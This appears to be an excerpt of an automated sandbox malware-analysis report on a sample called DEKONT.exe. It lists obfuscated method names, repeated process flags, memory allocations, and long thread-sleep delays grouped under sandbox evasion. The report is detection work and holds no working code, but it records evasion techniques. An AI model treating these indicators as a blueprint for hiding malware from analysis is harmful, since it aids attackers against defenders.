                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, dZi2dj2hRfNN8h8ksu.csHigh entropy of concatenated method names: 'ToString', 'rDLZ2npVs2', 'fuNZmmn1P9', 'DOQZDAglPg', 'wqpZrqQ7wH', 'mhvZiaEdXb', 'HlxZ5bTTva', 'MDuZNy0fHq', 'jovZxqtMGH', 'iZ4ZvWVp7j'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, KXbphEuMQhqJVEQoHN.csHigh entropy of concatenated method names: 'fTCXV8POU', 'YOsf4DMSK', 'zKPOQTjUT', 'vUGe7Yu1f', 's8SMVdvbn', 'ECPoxvOp1', 'wJ0l7PP7mgVKm7pksU', 'LONHPEUi8265Ew4qbO', 'aSx6QGAIn', 'M9xKlMe4m'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, lGaBmFeZoKPSkJP2Yp.csHigh entropy of concatenated method names: 'vc5CfD3IXy', 'ASLCOnWPQI', 'L2yCIvLsAb', 'To3CMUXlDp', 'BLMChjwWcj', 'JVxCZHJC3O', 'ut0C81SnUE', 'x28C69df3j', 'UdyCyyAOmi', 'S4dCKHEocf'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, Ywj4IaidrNmP8uv9vDJ.csHigh entropy of concatenated method names: 'Id5yLlpHWO', 'gy4yB3XQ69', 'FSwyX5YUs8', 'FL8yfTf6iA', 'SIxyqarAE2', 'rlZyOpucCs', 'xtFyeCEA0d', 'WoQyIEeMQj', 'BoOyMx7XYH', 'j92yo63jMS'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, B4811WBL5mqt3ICmNd.csHigh entropy of concatenated method names: 'Be6gYa1Mry', 'RNhgCCPmnl', 'MT3g3r93XP', 'DFi3jou71e', 'mIk3z8TjwO', 'ujdgTSmMtM', 'KYhgSq3AZk', 'XNQgGWHuTJ', 'HS8gbK7J3w', 'G0mguGLxOI'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, rLmnNArP7PMRCd7lnZ.csHigh entropy of concatenated method names: 'Evl6Y0Whxr', 'qgR6VsEdAm', 're76CWwgB0', 'bZC6aM43Io', 'TSg63UMjKx', 'Ivm6gFNOlM', 'byg6FFB0R0', 'UcN6EaaGCV', 'V4w6UCt7Lk', 'jX169cVtTZ'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.csHigh entropy of concatenated method names: 'PxCbwXdJr5', 'D9IbYynKIL', 'l9GbVZSH7o', 'eCLbCFOomy', 'asDbaHLltO', 'GVQb33uaOD', 'HLlbgrTb6P', 'jK2bFQIlLq', 'kCHbEtCv2i', 'YhVbUAoxDl'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, FBG5j0iuYmUu2hs3rvO.csHigh entropy of concatenated method names: 'BVSKL8JT5Y', 'VgxKB6mUN7', 'E12KXgaD9m', 'NWbo4MZp6D7eQuKkqtp', 'u4O1ncZ40P2AaXDrFJl', 'rNIAsvZDs2OwHN49hTb', 'kYjD05ZAi6Jpt0QPqwG'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, BFLjVfUFsTVdK6vfYh.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UBPGRQcean', 'Gh7Gj844bg', 'OZ3GzDf4N5', 'ENBbTqRG9y', 'EvRbSr2yTm', 'tq1bGYGv8l', 'T5ybb6hZCk', 'wmqQ5DplEUp2txgLK2P'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, F210rv93PN13RwKJgt.csHigh entropy of concatenated method names: 'V51345goeB', 'zfv3pHKBAx', 'jlj3WjfsrN', 'ToString', 'jVt3PTFlX2', 'shK3Jh18kc', 'EBgIAr4FQW6NbudKLPc', 'WknDC34Eysm7R6M5wJZ'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, Lx9sgrycVNWcPtH7Mh.csHigh entropy of concatenated method names: 'FZQgL2dWTg', 'OZdgBlfbmG', 'iGlgXJAjYy', 'bWhgfsRR8y', 'ey2gqCsvj9', 'wfigO0Ts0Q', 'm0ogeuk6h3', 'BbTgIYsToM', 'yENgMOilNQ', 'xKagoHKFjt'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, AdfsfmCabcv5q7JqiV.csHigh entropy of concatenated method names: 'o2H8UTwoUn', 'jtJ89ykxL2', 'ToString', 'b9K8YeR9y5', 'bPX8VfyOgm', 'f228CuIvTQ', 'U3F8aQkjAE', 'A9s83iQBbF', 'MHA8gKCxxM', 'By88FKKrHU'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, tlZ78fq5Zw1LILhJLc.csHigh entropy of concatenated method names: 'AAn6HO6HkR', 'Gjt6mhAy5U', 'qOx6DlTZMU', 'eHy6rtgrOM', 'Pba6cWLU3G', 'OJD6i0hRbv', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                  Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                  Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                  Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 8140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 9140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 92F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: A2F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: B880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: C880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597875Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597765Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597656Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597313Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 597063Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeWindow / User API: threadDelayed 2109Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeWindow / User API: threadDelayed 7718Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep count: 40 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7692Thread sleep count: 2109 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7692Thread sleep count: 7718 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -597063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeThread delayed: delay time: 600000Jump to behavior
